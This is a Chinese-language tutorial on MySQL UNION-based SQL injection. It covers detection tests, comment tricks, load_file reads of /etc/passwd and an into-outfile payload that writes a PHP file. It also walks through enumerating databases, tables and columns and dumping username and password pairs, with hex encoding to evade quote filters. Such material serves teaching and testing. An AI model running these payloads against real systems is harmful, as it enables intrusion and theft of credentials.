sql注入-union select

什么是SQL注入

SQL注入（Sql Injection ）

1. 是一种将SQL语句插入或添加到应用(用户)的输入参数中的攻击
2. 这些参数传递给后台的SQL数据库服务器加以解析并执行

哪里存在SQL注入？

• GET
• POST
• HTTP头部注入
• Cookie注入

任何客户端可控，传递到服务器的变量，并且和数据库进行交互，都有可能存在sql注入。

SQL注入的分类

1. 根据SQL数据类型分类

• 整型注入
• 字符串类型注入

2. 根据注入的语法分类

• UNION query SQL injection（可联合查询注入）
• Error-based SQL injection（报错型注入）
• Boolean-based blind SQL injection（布尔型注入）
• Time-based blind SQL injection（基于时间延迟注入）
• Stacked queries SQL injection（可多语句查询注入）

如何去判断SQL注入漏洞

• and 1=1 / and 1=2 回显页面不同（整形判断）
• 单引号判断 ‘ 显示数据库错误信息或者页面回显不同（整形，字符串类型判断）
• \ (转义符)
• -1/+1 回显下一个或上一个页面（整型判断）
• and sleep(5) (判断页面返回时间)

MySQL数据库的特性

MySQL中3种注释风格

• # （url编码为%23）

• – （–后边要跟上一个或多个空格 --+）

• /* … */

• /*! … */ 内联注释

  select * /!22222from/ users;(注：22222低于数据库版本号（5[0].7.20）就可显示from)

MySQL函数利用

常用函数

• user()
• database()
• @@version
• session_user()
• @@basedir
• @@datadir
• @@version_compile_os

load_file( )函数 读文件操作

前提

• 知道文件绝对路径
• 能够使用union查询
• 对web目录有写权限

UNION SELECT 1,load_file(’/etc/passwd’),3,4,5,6#
UNION SELECT 1,load_file(0x2f6574632f706173737764),3,4,5,6#

into outfile( )写文件操作

前提

• 文件名必须全路径（绝对路径），
• 用户必须有写文件的权限
• 没有对 ‘ 引号过滤

SELECT ‘<?php phpinfo(); ?>’ into outfile ‘c:\Windows\tmp\1.php’

连接字符串函数

• concat(str1,str2)
• concat_ws(separator, str1,str2…)
• group_concat(str1,str2…)

MySQL中information_scheme库

SCHEMATA表
字段：SCHEMA_NAME
TABLES表
字段：TABLE_SCHEMA， TABLE_NAME
COLUMNS表
字段：TBALE_SCHEMA,TABLE_NAME,COLUMN_NAME

MySQL中UNION规则

• UNION必须由两条或两条以上的SELECT语句组成，语句之间用关键字UNION分隔
• UNION中的每个查询必须包含相同的列。
• UNION会从查询结果集中自动去除了重复行。
• UNION query SQl injection

利用前提

1. 页面上有显示位

   优点:
   方便、快捷、易于利用
   缺点:
   需要显示位

步骤

1. 判断列数

   order by 10
   order by 20
   order by 15
   …

2. 判断显示位

   url?id=-1 union select 1,2,3,4,5

3. 获取当数据库名称和当前连接数据库的用户

   url?id=-1 union select 1,2,databaes(),4,5
   url?id=-1 union select 1,2,user(),4,5

4. 列出所有数据库

   limit 一个一个打印出来库名
   select SCHEMA_NAME from information_schema.SCHEMATA limit 0,1
   group_concat 一次性全部显示
   select group_concat(SCHEMA_NAME) from information_schema.SCHEMATA

5. 列出(数据库：test)中所有的表

   limit 一个一个打印出来字段名
   select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=‘test’
   limit 0,1
   group_concat 一次性全部显示
   select group_concat(TABLE_NAME) from information_schema.TABLES where
   TABLE_SCHEMA=0x674657374
   注意：数据库名称可以用十六进制来代替字符串，这样可以绕过单引号的限制。

6. 列出（数据库：test 表：admin ）中所有的字段

   limit 一个一个打印出来
   select COLUMN_NAME from information_schema.COLUMNS where
   TABLE_SCHEMA=‘baji’ and TABLE_NAME=‘users’ limit 0,1
   group_concat 一次性全部显示
   select group_concat(COLUMN_NAME) from information_schema.COLUMNS where
   TABLE_SCHEMA=0x74657374 and TABLE_NAME=0x61646d696e

7. 列出（数据库：test 表：admin ）中的数据

   limit 一个一个打印出来
   select username,passwd from test.admin limit 0,1
   group_concat 把 一次性全部打印
   select group_concat(concat(username,0x20,passwd)) from test.admin
   network